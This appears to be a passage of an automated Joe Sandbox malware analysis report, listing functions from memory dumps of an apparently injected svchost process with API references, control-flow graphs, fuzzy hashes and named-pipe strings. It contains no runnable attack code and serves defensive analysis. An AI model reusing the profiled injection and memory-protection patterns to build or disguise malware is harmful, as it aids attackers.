                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1C3192B8200A6AACFE15EBA5F85D7EC6364EB74384FC24427944D16175AF78C24EC390
                                                                                                                                                                                                                                                Function 00000216819BD398 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00000216819BD3A7
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD3BC
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD3DD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD40A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD41B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD42C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 00000216819BD447
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD47D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000001,00000216819BF23C,?,?,?,?,00000216819BC50F,?,?,?,?,?,00000216819B7AC0), ref: 00000216819BD49C
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819BDC3C: HeapAlloc.KERNEL32 ref: 00000216819BDC91
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD4C4
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819BDCB4: HeapFree.KERNEL32 ref: 00000216819BDCCA
                                                                                                                                                                                                                                                  • Part of subcall function 00000216819BDCB4: GetLastError.KERNEL32 ref: 00000216819BDCD4
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD4D5
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00000216819C0FDB,?,?,?,00000216819C09CC,?,?,?,00000216819BCDBF), ref: 00000216819BD4E6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 570795689-0
                                                                                                                                                                                                                                                • Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction ID: e5a810ece8de63f246f6c79189baeaaf24dc1b76953f089aafb89c435761648f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 63416F303056748EFE5CB772955D3ED21C65B74BB8F164724A93A067D7EE28D8494300
                                                                                                                                                                                                                                                Function 00000216819B224C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2171963597-1908187885
                                                                                                                                                                                                                                                • Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction ID: 75ba977ad40e7920c3bef7c802ec8c1777a5adcc241fa8a0aef53cacd332f0b1
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6212936614B508BFB10CB25F44C3AE67A1F799BA5F514215EA9902BA8DF7CC54DCB00
                                                                                                                                                                                                                                                Function 0000021681989EF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 390 21681989ef0-21681989f57 call 2168198ae08 393 2168198a3b8-2168198a3bf call 2168198c0b8 390->393 394 21681989f5d-21681989f60 390->394 394->393 395 21681989f66-21681989f6c 394->395 397 21681989f72-21681989f76 395->397 398 2168198a03b-2168198a04d 395->398 397->398 402 21681989f7c-21681989f87 397->402 400 2168198a053-2168198a057 398->400 401 2168198a308-2168198a30c 398->401 400->401 403 2168198a05d-2168198a068 400->403 405 2168198a30e-2168198a315 401->405 406 2168198a345-2168198a34f call 21681988004 401->406 402->398 404 21681989f8d-21681989f92 402->404 403->401 407 2168198a06e-2168198a075 403->407 404->398 408 21681989f98-21681989fa2 call 21681988004 404->408 405->393 409 2168198a31b-2168198a340 call 2168198a3c0 405->409 406->393 416 2168198a351-2168198a370 call 21681986d50 406->416 412 2168198a239-2168198a245 407->412 413 2168198a07b-2168198a0b6 call 216819891a0 407->413 408->416 424 21681989fa8-21681989fd3 call 21681988004 * 2 call 216819894a8 408->424 409->406 412->406 417 2168198a24b-2168198a24f 412->417 413->412 428 2168198a0bc-2168198a0c5 413->428 421 2168198a25f-2168198a267 417->421 422 2168198a251-2168198a25d call 21681989468 417->422 421->406 427 2168198a26d-2168198a27a call 21681989040 421->427 422->421 434 2168198a280-2168198a288 422->434 458 21681989ff3-21681989ffd call 21681988004 424->458 459 21681989fd5-21681989fd9 424->459 427->406 427->434 432 2168198a0ca-2168198a0fc 428->432 436 2168198a102-2168198a10e 432->436 437 2168198a228-2168198a22f 432->437 441 2168198a28e-2168198a292 434->441 442 2168198a39b-2168198a3b7 call 21681988004 * 2 call 2168198c018 434->442 436->437 443 2168198a114-2168198a12d 436->443 437->432 440 2168198a235 437->440 440->412 447 2168198a294-2168198a2a3 call 21681989468 441->447 448 2168198a2a5 441->448 442->393 444 2168198a133-2168198a178 call 2168198947c * 2 443->444 445 2168198a225 443->445 472 2168198a1b6-2168198a1bc 444->472 473 2168198a17a-2168198a1a0 call 2168198947c call 2168198a630 444->473 445->437 453 2168198a2a8-2168198a2b2 call 2168198aea0 447->453 448->453 453->406 469 2168198a2b8-2168198a306 call 216819890d0 call 216819892d4 453->469 458->398 475 21681989fff-2168198a01f call 21681988004 * 2 call 2168198aea0 458->475 459->458 463 21681989fdb-21681989fe6 459->463 463->458 468 21681989fe8-21681989fed 463->468 468->393 468->458 469->406 479 2168198a1be-2168198a1c2 472->479 480 2168198a220 472->480 489 2168198a1a2-2168198a1b4 473->489 490 2168198a1c7-2168198a21b call 21681989e1c 473->490 494 2168198a021-2168198a02b call 2168198af90 475->494 495 2168198a036 475->495 479->444 480->445 489->472 489->473 490->480 498 2168198a031-2168198a394 call 21681987c64 call 2168198a9ec call 21681987e58 494->498 499 2168198a395-2168198a39a call 2168198c018 494->499 495->398 498->499 499->442
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 0442a4f2f429f8f48b690bb4eb5025a919f4eba2242cb7c6428bdf88597eaeb6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DAD1AD72644B408FEF609F65D48C3DD77A0F7A6BA8F020216EE8957B96DB38D499C700
                                                                                                                                                                                                                                                Function 00000216819BAAF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 509 216819baaf0-216819bab57 call 216819bba08 512 216819bafb8-216819bafbf call 216819bccb8 509->512 513 216819bab5d-216819bab60 509->513 513->512 515 216819bab66-216819bab6c 513->515 516 216819bab72-216819bab76 515->516 517 216819bac3b-216819bac4d 515->517 516->517 521 216819bab7c-216819bab87 516->521 519 216819bac53-216819bac57 517->519 520 216819baf08-216819baf0c 517->520 519->520 522 216819bac5d-216819bac68 519->522 524 216819baf0e-216819baf15 520->524 525 216819baf45-216819baf4f call 216819b8c04 520->525 521->517 523 216819bab8d-216819bab92 521->523 522->520 526 216819bac6e-216819bac75 522->526 523->517 527 216819bab98-216819baba2 call 216819b8c04 523->527 524->512 528 216819baf1b-216819baf40 call 216819bafc0 524->528 525->512 537 216819baf51-216819baf70 call 216819b7950 525->537 530 216819bae39-216819bae45 526->530 531 216819bac7b-216819bacb6 call 216819b9da0 526->531 527->537 540 216819baba8-216819babd3 call 216819b8c04 * 2 call 216819ba0a8 527->540 528->525 530->525 538 216819bae4b-216819bae4f 530->538 531->530 546 216819bacbc-216819bacc5 531->546 542 216819bae51-216819bae5d call 216819ba068 538->542 543 216819bae5f-216819bae67 538->543 578 216819babd5-216819babd9 540->578 579 216819babf3-216819babfd call 216819b8c04 540->579 542->543 553 216819bae80-216819bae88 542->553 543->525 545 216819bae6d-216819bae7a call 216819b9c40 543->545 545->525 545->553 551 216819bacca-216819bacfc 546->551 555 216819bad02-216819bad0e 551->555 556 216819bae28-216819bae2f 551->556 558 216819bae8e-216819bae92 553->558 559 216819baf9b-216819bafb7 call 216819b8c04 * 2 call 216819bcc18 553->559 555->556 560 216819bad14-216819bad2d 555->560 556->551 562 216819bae35 556->562 563 216819baea5 558->563 564 216819bae94-216819baea3 call 216819ba068 558->564 559->512 566 216819bae25 560->566 567 216819bad33-216819bad78 call 216819ba07c * 2 560->567 562->530 572 216819baea8-216819baeb2 call 216819bbaa0 563->572 564->572 566->556 593 216819badb6-216819badbc 567->593 594 216819bad7a-216819bada0 call 216819ba07c call 216819bb230 567->594 572->525 588 216819baeb8-216819baf06 call 216819b9cd0 call 216819b9ed4 572->588 578->579 584 216819babdb-216819babe6 578->584 579->517 591 216819babff-216819bac1f call 216819b8c04 * 2 call 216819bbaa0 579->591 584->579 589 216819babe8-216819babed 584->589 588->525 589->512 589->579 613 216819bac21-216819bac2b call 216819bbb90 591->613 614 216819bac36 591->614 598 216819bae20 593->598 599 216819badbe-216819badc2 593->599 608 216819bada2-216819badb4 594->608 609 216819badc7-216819bae1b call 216819baa1c 594->609 598->566 599->567 608->593 608->594 609->598 617 216819bac31-216819baf94 call 216819b8864 call 216819bb5ec call 216819b8a58 613->617 618 216819baf95-216819baf9a call 216819bcc18 613->618 614->517 617->618 618->559
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 97df6bae4fd4c272dad566c70eca623a2d67dd5b8b7a4d677d9b7fd89218708b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7CD1CF72A00BA08EEF60DF65D48C3DD77A0F7A9BA8F120115EE8957B96DB34D489C700
                                                                                                                                                                                                                                                Function 00000216819BF904 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: c92aa99dd7ccd533ff694c828cd583452ffd66c277c2e8ad28bd1c6b2b834d25
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 95419032311A2099FE19DB66A94C7DD22A5BB69BE0F4B41299D8D97794EB38C44DC300
                                                                                                                                                                                                                                                Function 00000216819B104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 658 216819b104c-216819b10b9 RegQueryInfoKeyW 659 216819b10bf-216819b10c9 658->659 660 216819b11b5-216819b11d0 658->660 659->660 661 216819b10cf-216819b111f RegEnumValueW 659->661 662 216819b11a5-216819b11af 661->662 663 216819b1125-216819b112a 661->663 662->660 662->661 663->662 664 216819b112c-216819b1135 663->664 665 216819b1147-216819b114c 664->665 666 216819b1137 664->666 668 216819b114e-216819b1193 GetProcessHeap call 216819c6168 GetProcessHeap HeapFree 665->668 669 216819b1199-216819b11a3 665->669 667 216819b113b-216819b113f 666->667 667->662 670 216819b1141-216819b1145 667->670 668->669 669->662 670->665 670->667
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: c23a57b3d10ce56a0b0d8c8c28d6846a727f3081025e08c0ecdbdda6a56f4326
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AA415C73214B84CAEB60CF21F44879E77A1F399B99F458129DB8907B58EF38C589CB40
                                                                                                                                                                                                                                                Function 00000216819BD5D8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00000216819BCD4E,?,?,?,?,?,?,?,?,00000216819BD50D,?,?,00000001), ref: 00000216819BD660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: 023bd0c4fd2a4507a0837e78a07aff7af5b620e54b3f1399547a36c97c6cd93f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BD119430704670C9FE58A722A55D3ED61CA6F647F8F178335A87D477DAEE28C8094700
                                                                                                                                                                                                                                                Function 0000021681986920 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2624132952.0000021681980000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000021681980000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_21681980000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: f49bb9b9d80b117db9903789746e1270199453ebc1c1364e7fa6cde92d830728
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1E81D331B802418FFE54AF66B44D3DD66D1EBB5B80F4A80169A699F7D6DB38C84D8700
                                                                                                                                                                                                                                                Function 00000216819B7520 Relevance: 12.2, APIs: 8, Instructions: 228COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 190073905-0
                                                                                                                                                                                                                                                • Opcode ID: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction ID: ba3c417bfb60e10b8c3c379fba3e1ee71c4e73dfb6e89b2352b27acafea1575d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 631ceae67eae31c045c263838f49675c0354f8d7e0c0c05f5239024a302f0f12
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A81F731B107618EFF5C9BA9A44D3ED22D0A7B5780F574225AA48C77D6EB38C94DC701
                                                                                                                                                                                                                                                Function 00000216819BA148 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                • String ID: api-ms-
                                                                                                                                                                                                                                                • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                • Opcode ID: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction ID: 31a5975f716846480eb05b1e16f4336731cd4458d17d25f082acd2214823b98f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1bda5a7f51937e5fba9747c90859e34dfa5f89533a2a1b8d1dea998784ab284d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 77318C31212A60A9EE62DB42A80C7DD63E4BB69BB0F5B0625DD5D4B390EF39C48D8310
                                                                                                                                                                                                                                                Function 00000216819C4324 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                • String ID: CONOUT$
                                                                                                                                                                                                                                                • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                • Opcode ID: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction ID: 9ce688ee93ba90ac0c84ef49c1703882f7e0d67c32f2dcf740e79a2fb6622ad8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c50c600c840af11fb29c95c0db3c2be4712be37c9ecc349f2f252041d9feab2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: ED118F32314A808AEB508B52F95C39D76A0F7E8FE5F054224EA9E87B94DF38C8188744
                                                                                                                                                                                                                                                Function 00000216819B37A4 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                                                                                                                                • String ID: wr
                                                                                                                                                                                                                                                • API String ID: 1092925422-2678910430
                                                                                                                                                                                                                                                • Opcode ID: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction ID: 5f9aef3c9174a1739a59fd907a99b75256bf9e1f006052577327139885cb0591
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d02d62af4a13f9151a1d64f675f2e823d7ed1e1e396348dfe74f8be14938124b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4A115B36704B508AEF24DB12F44C2AD62B0FB98B95F460029DE8D07B94EF3DC648C704
                                                                                                                                                                                                                                                Function 00000216819B5B40 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1666949209-0
                                                                                                                                                                                                                                                • Opcode ID: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction ID: 144a9ee46fec38c6331d903ef6d07f2e853d302d3e43114fb5f259d75b68a60e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2460c92bfe80c12f43b9e41940236e3d31cb2b1f5e55ffad558bfd096889bb43
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 40D1A936205B9886EE70DB16E49839EB7A0F3D8B84F514216EACE477A9DF3CC545CB00
                                                                                                                                                                                                                                                Function 00000216819B14A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 83memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000005.00000002.2625508344.00000216819B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000216819B0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_5_2_216819b0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Free
